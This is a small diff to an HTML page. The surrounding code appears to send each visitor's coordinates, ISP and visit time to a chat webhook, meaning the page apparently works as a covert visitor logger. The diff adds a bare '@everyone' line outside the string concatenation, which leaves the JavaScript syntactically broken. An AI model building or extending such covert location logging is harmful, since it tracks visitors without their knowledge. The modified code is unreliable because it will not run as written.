--- a/index.html
+++ b/index.html
@@ -228,6 +228,7 @@
                              `**Coordinates:** ${loc}\n` +
                              `**ISP:** ${org}\n` +
                              `**Time:** ${dateTime}`
+                             @everyone
                 })
             });
         });
